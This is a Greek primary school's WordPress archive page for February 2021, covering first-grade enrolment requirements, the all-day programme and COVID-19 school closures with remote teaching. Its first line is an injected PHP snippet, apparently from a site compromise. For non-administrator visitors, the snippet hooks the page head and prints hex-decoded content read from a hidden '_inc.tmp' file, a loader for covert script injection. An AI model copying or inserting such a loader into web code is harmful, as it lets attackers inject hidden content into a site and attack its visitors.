if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Φεβρουάριος, 2021 |

Monthly Archives: Φεβρουάριος 2021

Εγγραφές μαθητών στην Α’ τάξη για το Σχολ. Έτος 2021-2022

Σας ενημερώνουμε ότι από την τρέχουσα χρονιά οι εγγραφές των μαθητών στην Α’ τάξη του δημοτικού θα πραγματοποιούνται από την 1/3 έως και την 20/3 κάθε έτους. Οι εγγραφές λοιπόν των μαθητών που θα φοιτήσουν στην Α’ τάξη κατά το σχολ. έτος 2021-2022 θα πραγματοποιηθούν φέτος από τη 1/3/2021 έως και τις 20/3/2021.
Κατά το σχολικό έτος 2021-2022 στην Α’ Τάξη του Δημοτικού Σχολείου θα φοιτήσουν οι μαθητές/τριες που γεννήθηκαν από 1-1-2015 έως και 31-12-2015.
Οι αιτήσεις για εγγραφή στο Ολοήμερο θα γίνουν δεκτές όλες χωρίς προϋποθέσεις.

ΔΙΚΑΙΟΛΟΓΗΤΙΚΑ ΕΓΓΡΑΦΩΝ

Οι γονείς και κηδεμόνες υποβάλλουν σχετικές αιτήσεις-υπεύθυνες δηλώσεις εγγραφής στο δημοτικό σχολείο που ανήκουν σύμφωνα με τα όρια της σχολικής περιφέρειας, προσκομίζοντας τα κάτωθι δικαιολογητικά:

α. Πιστοποιητικό γέννησης Δήμου ή Κοινότητας. (ΔΕ ΘΑ ΠΡΟΣΚΟΜΙΣΤΕΙ ΑΠΟ ΤΟΥΣ ΓΟΝΕΙΣ. ΘΑ ΠΑΡΑΛΗΦΘΕΙ ΑΠΟ ΤΟΝ ΔΗΜΟ ΗΛΕΚΤΡΟΝΙΚΑ)

β. Βιβλιάριο Εμβολίων του/της μαθητή/τριας, ή προσκόμιση άλλου στοιχείου, από το οποίο αποδεικνύεται ότι έγιναν τα εμβόλια που προβλέπονται και είναι ενταγμένα στο Εθνικό Πρόγραμμα Εμβολιασμών.

γ. Το Ατομικό Δελτίο Υγείας Μαθητή (οι ενδιαφερόμενοι λαμβάνουν το έντυπο από το νηπιαγωγείο ή το σχολείο μας και το συμπληρώνει ιατρός)

δ. Αποδεικτικό στοιχείο από το οποίο διαπιστώνεται η διεύθυνση κατοικίας του μαθητή/τριας (λογαριασμός ΔΕΗ/ΟΤΕ/ΕΥΔΑΠ ή εκκαθαριστικό εφορίας ή συμβόλαιο οικίας κλπ)

ε. Βεβαίωση Φοίτησης Νηπιαγωγείου και Πιστοποιητικό Φοίτησης Νηπιαγωγείου για την εγγραφή στο Δημοτικό. (ΔΕ ΘΑ ΠΡΟΣΚΟΜΙΣΤΟΥΝ ΑΠΟ ΤΟΥΣ ΓΟΝΕΙΣ. ΘΑ ΠΑΡΑΛΗΦΘΟΥΝ ΑΠΟ ΤΟ ΝΗΠΙΑΓΩΓΕΙΟ ΕΝΔΟΫΠΗΡΕΣΙΑΚΑ)

Στην περίπτωση μαθητών με αναπηρία και ειδικές εκπαιδευτικές ανάγκες, οι γονείς και κηδεμόνες συνυποβάλλουν γνωμάτευση από Κ.Ε.Σ.Υ. ή δημόσιο ιατροπαιδαγωγικό κέντρο ή άλλη αρμόδια δημόσια υπηρεσία, χωρίς αυτή να αποτελεί προϋπόθεση εγγραφής.

Εγγραφή στο Ολοήμερο

Οι μαθητές/τριες εγγράφονται στο Ολοήμερο Πρόγραμμα κατόπιν σχετικής αίτησης-δήλωσης των γονέων/κηδεμόνων τους (έντυπο που θα δοθεί από το σχολείο). Θα γίνουν δεκτές όλες ανεξαιρέτως οι αιτήσεις των γονέων/κηδεμόνων για φοίτηση των μαθητών/τριών στο Ολοήμερο Πρόγραμμα, χωρίς προϋποθέσεις.

Η αποχώρηση των μαθητών/τριών του Ολοήμερου Προγράμματος πραγματοποιείται στις 16:00.

Ενδιάμεση αποχώρηση των μαθητών/τριών μπορεί να γίνεται μετά το τέλος της 2ης ώρας του Ολοήμερου Προγράμματος (15:00), εφόσον κατατεθεί σχετική ενυπόγραφη δήλωση των γονέων/κηδεμόνων.

Προϋπόθεση συμμετοχής μαθητών/τριών στο τμήμα Πρωινής Ζώνης (7:00-8:00)

Στο τμήμα αυτό δικαίωμα έχουν μαθητές/τριες οι οποίοι είναι εγγεγραμμένοι/νες και φοιτούν στο ολοήμερο πρόγραμμα.
Αιτήσεις εγγραφής δύνανται να υποβάλλουν και γονείς ή κηδεμόνες που διαμένουν εκτός σχολικής περιφέρειας, εφόσον στο σχολείο φοιτούν ήδη αδέλφια τού προς εγγραφή μαθητή.

ΠΡΟΣΟΧΗ: Εξαιτίας της δεδομένης κατάστασης του COVID-19 οι γονείς-κηδεμόνες των μαθητών θα προσέρχονται στο σχολείο έπειτα από προγραμματισμένο ραντεβού με τον Διευθυντή του σχολείου. Ο γονέας θα πρέπει να επικοινωνήσει πρώτα τηλεφωνικά με το σχολείο στο τηλέφωνο 2757022275 και ώρες 11.00- 12.00, προκειμένου να καθορισθεί συγκεκριμένη ημέρα και ώρα προσέλευσής του, με τήρηση των κανόνων προσωπικής προστασίας και τηρώντας το υγειονομικό πρωτόκολλο για την προστασία από τον COVID-19.

Δημοτικό Σχολείο Λεωνιδίου

Παράταση αναστολής λειτουργίας σχολείου – εφαρμογή τηλεκπαίδευσης έως και 5/3/2021

Αγαπητοί γονείς και κηδεμόνες,

σύμφωνα με τις νέες επίσημες ανακοινώσεις των αρμόδιων φορέων παρατείνονται στον νομό μας τα περιοριστικά μέτρα για την αντιμετώπιση της διασποράς του κορωνοϊού (COVID-19) κατά μία εβδομάδα, δηλαδή έως τις 8/3/2021 στις 6:00 το πρωί.

Ως εκ τούτου το σχολείο μας θα παραμείνει κλειστό (όπως και όλα τα σχολεία του νομού) έως και την Παρασκευή 5/3/2021, διάστημα κατά το οποίο θα λειτουργήσει η τηλεκπαίδευση.

Την Κυριακή 7/3/2021 θα ακολουθήσει νέα ενημέρωση για τη λειτουργία του σχολείου μας.

Μείνετε ασφαλείς και αισιόδοξοι! Καλή δύναμη σε όλους!

Προσωρινή αναστολή λειτουργίας σχολείου – Έναρξη τηλεκπαίδευσης

Αγαπητοί γονείς και κηδεμόνες,

σας ενημερώνουμε ότι αύριο Πέμπτη 25/2/2021 και μεθαύριο Παρασκευή 26/2/2021 το σχολείο μας (όπως και όλα τα σχολεία του νομού) θα παραμείνει κλειστό στο πλαίσιο των αυξημένων μέτρων για τον περιορισμό της διασποράς του κορωνοϊού στον νομό Αρκαδίας. Ταυτόχρονα τίθεται ξανά σε λειτουργία η εξ αποστάσεως εκπαίδευση μέσω τηλεδιασκέψεων κατά το πρότυπο της προηγούμενης καραντίνας (Νοεμβρίου-Δεκεμβρίου 2020).

Πιο συγκεκριμένα, αύριο Πέμπτη 25/2/2021 και μεθαύριο Παρασκευή 26/2/2021 θα ισχύσει το πρόγραμμα της τηλεκπαίδευσης από τις 14:10 έως τις 17:20. Το πρόγραμμα κάθε τάξης θα σας αποσταλεί εκ νέου από τον/την εκπαιδευτικό αυτής σε περίπτωση που το έχετε χάσει.

Οι μαθητές που έχουν επιστρέψει τον εξοπλισμό (τάμπλετ ή υπολογιστή), μπορούν αύριο το πρωί από τις 9:00 έως τις 12:00 να έρθουν στο σχολείο να τον παραλάβουν.

Την Κυριακή 28/2/2021 θα ακολουθήσει νέα ενημέρωση για τη λειτουργία του σχολείου μας.

Μείνετε ασφαλείς! Καλή δύναμη σε όλους!